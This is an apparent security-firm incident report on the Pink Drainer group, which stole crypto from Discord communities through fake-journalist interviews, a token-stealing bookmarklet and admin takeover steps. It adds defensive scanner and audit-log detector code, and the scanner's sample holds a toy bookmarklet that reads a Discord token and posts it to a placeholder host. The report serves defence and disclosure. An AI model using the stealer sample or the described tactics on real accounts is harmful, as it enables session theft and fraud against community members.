Pink Drainer steals $3M from multiple hack events including OpenAI CTO, Orbiter Finance

Overview

A large number of Discord and Twitter accounts have been compromised recently, including those of Evmos, Pika Protocol, OpenAI's CTO, and Orbiter Finance.

The attackers post phishing links from the Discord accounts they have taken over. Many users opened the malicious sites, signed the signatures those sites requested, and lost their assets as a result.

ScamSniffer has found that all of these incidents trace back to a group called Pink Drainer. Looking deeper, almost every Discord compromise of the past month is linked to them.

Analyzing the stolen funds on Ethereum mainnet, Arbitrum, BNB Chain, Polygon, Optimism, and other chains, we found that the group has stolen about $3 million in assets from about 1,932 victims.

Related Hacks

By analyzing the malicious websites Pink Drainer set up over the past month, we found that many Discord compromises are related to them, for example Evmos, Starknet ID, LiFi, Cherry Network, Pika Protocol, Orbiter Finance, Flare Network, and OpenAI's CTO.

Brand                 Date     Phishing site
Evmos                 May 8    evmos-claim.org
Starknet ID           May 11   starknet.pm
LiFi                  May 17   lifi.pm
eth_ben quote tweet   May 26   a0k1verse.club
Cherry Network        May 26   cherry.pm
Pika Protocol         May 31   pikaprotocol.pm
Orbiter Finance       June 1   orbiter.pm
Flare Network         June 1   flarenetwork.net
OpenAI CTO            June 2   chatgpt.build

Social Engineering Attacks

How did they gain access to so many projects? Through social engineering. Based on interviews with several victims of the Discord compromises, most of them started with a carefully crafted social engineering approach that ended in the theft of an administrator's Discord token.

The attackers pose as journalists from well-known outlets such as Decrypt and Cointelegraph and request an interview. The exchange usually runs for one to three days and ends with a demand for "KYC verification", and it is that final step that carries the Discord phishing.

For example, the Discord administrator is steered to a malicious page posing as a Carl-bot verification step and told to add a bookmark that contains the malicious code.

The "Drag Me" button is a bookmarklet: a bookmark whose URL is javascript: code rather than a web address, and this one carries JavaScript that steals the user's Discord token. A bookmarklet runs in the origin of whatever tab it is clicked in, so when it is triggered on discord.com it has the same access to the session as the Discord client's own scripts.

An administrator who follows these steps hands the attacker their Discord token, and with it their session.

For more technical details, please refer to: How Scammer Used Malicious Bookmark to Gain Access to Discords of NFT Projects by SlowMist.
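As an added example (not ScamSniffer's or SlowMist's code), here is a defender-side check for the bookmark trick described above: a scanner that reads a browser bookmark export and flags javascript: bookmarklets whose code touches the Discord token or sends data off-page. The heuristic patterns, the sample export and the placeholder exfiltration URL are all constructed for this example and are not taken from a real payload.

```javascript
// Added example, not ScamSniffer's or SlowMist's code: scan a browser
// bookmark export for "javascript:" bookmarklets and flag the ones that
// look like a Discord token stealer. The patterns are assumptions about
// what such a payload typically contains, not a signature from the page.
const SUSPICIOUS_PATTERNS = [
  { name: "reads localStorage", re: /localStorage/i },
  { name: "references token", re: /token/i },
  { name: "touches webpack chunks", re: /webpackChunk/i },
  { name: "sends data off-page", re: /fetch\(|XMLHttpRequest|sendBeacon|webhook/i },
];

// Bookmark exports HTML-escape the URL and payloads are often percent-
// encoded, so match on the decoded form rather than the raw attribute.
function decodeBookmarkUrl(href) {
  const unescaped = href
    .replace(/&quot;/g, '"').replace(/&#39;/g, "'")
    .replace(/&lt;/g, "<").replace(/&gt;/g, ">").replace(/&amp;/g, "&");
  try {
    return decodeURIComponent(unescaped);
  } catch {
    return unescaped; // malformed %-sequences: fall back to the raw string
  }
}

// Pull <A HREF="...">title</A> entries out of a Netscape-format bookmark
// export, which is what Chrome, Edge and Firefox produce.
function parseBookmarkExport(html) {
  const entries = [];
  const re = /<A\s+[^>]*?HREF="([^"]*)"[^>]*>([^<]*)<\/A>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    entries.push({ title: m[2].trim(), href: decodeBookmarkUrl(m[1]) });
  }
  return entries;
}

// Return every javascript: bookmark with the list of patterns it matched.
// An empty "reasons" list means it is a bookmarklet but nothing in it
// looks like token theft.
function scanBookmarks(html) {
  return parseBookmarkExport(html)
    .filter((e) => /^\s*javascript:/i.test(e.href))
    .map((e) => ({
      title: e.title,
      reasons: SUSPICIOUS_PATTERNS.filter((p) => p.re.test(e.href)).map((p) => p.name),
    }));
}

// Constructed sample export: a normal link, a harmless bookmarklet, and a
// toy "Drag Me" bookmarklet shaped like a token stealer. The exfiltration
// URL is a placeholder under the reserved .invalid TLD.
const SAMPLE_EXPORT = `<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL><p>
    <DT><A HREF="https://discord.com/channels/@me" ADD_DATE="0">Discord</A>
    <DT><A HREF="javascript:(function(){window.scrollTo(0,0)})()" ADD_DATE="0">Scroll to top</A>
    <DT><A HREF="javascript:(function(){var t=localStorage.getItem(&quot;token&quot;);fetch(&quot;https://example.invalid/hook&quot;,{method:&quot;POST&quot;,body:t})})()" ADD_DATE="0">Drag Me</A>
</DL><p>`;

console.log(JSON.stringify(scanBookmarks(SAMPLE_EXPORT), null, 2));
```

Export bookmarks from the browser's bookmark manager and pass the resulting HTML to scanBookmarks. Any javascript: bookmark on an administrator's machine deserves a look; one that both reads storage and calls fetch should be treated as a compromise of every session it was clicked in.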

Lasting Longer

After gaining access, the attackers also take a series of steps to keep the attack running for as long as possible:

  • Remove the other administrators
  • Grant administrator to an account they control
  • Use the compromised main account to commit violations that get it banned by Discord

Together these steps leave the project's remaining staff unable to delete the phishing messages from the server, so the posts stay up longer and reach more users.
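As an added example (not ScamSniffer's code), here is detection logic for that persistence pattern run over a guild's role-change audit entries: it flags any actor who, inside a short window, strips a privileged role from other members and grants one to another account. The entry shape, the role names treated as privileged and the sample log are constructed for this example; Discord's real audit log API uses numeric action types and a changes array, so real entries would need to be mapped onto this shape first.

```javascript
// Added example, not ScamSniffer's code: flag the takeover pattern above
// (strip other admins, then promote an attacker-controlled account) in a
// guild's audit log. Entries use a constructed, simplified shape; the real
// Discord audit log API uses numeric action types and a "changes" array,
// so a real deployment would first map those onto this shape.
// Which role names count as privileged is an assumption for the example.
const PRIVILEGED_ROLES = new Set(["Admin", "Moderator"]);

// Each entry: { ts: epoch ms, actor: who made the change, action:
// "ROLE_ADD" | "ROLE_REMOVE", target: who was changed, role: role name }.
// Returns one finding per actor who, within windowMs, both removed a
// privileged role from someone else and granted one to someone else.
function detectAdminTakeover(log, windowMs = 30 * 60 * 1000) {
  const byActor = new Map();
  for (const e of log) {
    if (!PRIVILEGED_ROLES.has(e.role)) continue;
    if (!byActor.has(e.actor)) byActor.set(e.actor, []);
    byActor.get(e.actor).push(e);
  }

  const findings = [];
  for (const [actor, events] of byActor) {
    events.sort((a, b) => a.ts - b.ts);
    // Slide a window over this actor's privileged-role changes.
    for (let i = 0; i < events.length; i++) {
      const start = events[i].ts;
      const inWindow = events.filter((e) => e.ts >= start && e.ts - start <= windowMs);
      const removed = inWindow
        .filter((e) => e.action === "ROLE_REMOVE" && e.target !== actor)
        .map((e) => e.target);
      const granted = inWindow
        .filter((e) => e.action === "ROLE_ADD" && e.target !== actor)
        .map((e) => e.target);
      if (removed.length > 0 && granted.length > 0) {
        findings.push({
          actor,
          windowStart: new Date(start).toISOString(),
          removed: [...new Set(removed)],
          granted: [...new Set(granted)],
        });
        break; // one finding per actor is enough to page someone
      }
    }
  }
  return findings;
}

// Constructed sample log. "alice" is a legitimate admin whose stolen token
// is being replayed; the day-old entry is routine offboarding and should
// not trip the detector on its own.
const T0 = Date.UTC(2023, 5, 1, 9, 0, 0); // arbitrary reference time
const MIN = 60 * 1000;
const SAMPLE_LOG = [
  { ts: T0 - 24 * 60 * MIN, actor: "alice", action: "ROLE_REMOVE", target: "dave", role: "Moderator" },
  { ts: T0, actor: "alice", action: "ROLE_REMOVE", target: "bob", role: "Admin" },
  { ts: T0 + 1 * MIN, actor: "alice", action: "ROLE_REMOVE", target: "carol", role: "Admin" },
  { ts: T0 + 2 * MIN, actor: "alice", action: "ROLE_ADD", target: "helper-bot-7731", role: "Admin" },
  { ts: T0 + 5 * 60 * MIN, actor: "frank", action: "ROLE_ADD", target: "erin", role: "Moderator" },
  { ts: T0 + 6 * 60 * MIN, actor: "frank", action: "ROLE_ADD", target: "grace", role: "Member" },
];

console.log(JSON.stringify(detectAdminTakeover(SAMPLE_LOG), null, 2));
```

The window is the tuning knob: the sample attacker does everything within a few minutes, and a routine removal a day earlier does not combine with it. A finding on an account whose owner did not make the changes is a strong sign that the account's token is in someone else's hands, and the response is to invalidate that session and re-check role assignments before the phishing messages go out.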

Stolen Stats

Across the chains we analyzed, about $3 million has been stolen so far from about 1,932 victims.

Of that, about $2.43 million was taken on Ethereum mainnet and about $350k on Arbitrum.

Learn More: https://dune.com/scamsniffer/pinkdrainer-stats

Pink Drainer

Pink Drainer was first spotted by Taylor Monahan through ScamSniffer's on-chain monitoring bot.

The victim 0xf529127107c91bbf6c141304718491a437fb2f5f lost nearly $320,000 in NFTs, including 8 Otherside Koda, 1 BoredApeYachtClub, 1 MutantApeYachtClub, and 11 Otherdeed.

A few hours later, the address that moved the victim's assets was assigned the ENS name pink-drainer.eth, which is where the name Pink Drainer comes from.

About Scam Sniffer

Scam Sniffer is an anti-scam platform that combines off-chain and on-chain monitoring data to provide real-time anti-scam protection for web3 users.

We’ve helped well-known platforms protect their users and are committed to making web3 secure for the next billion users.
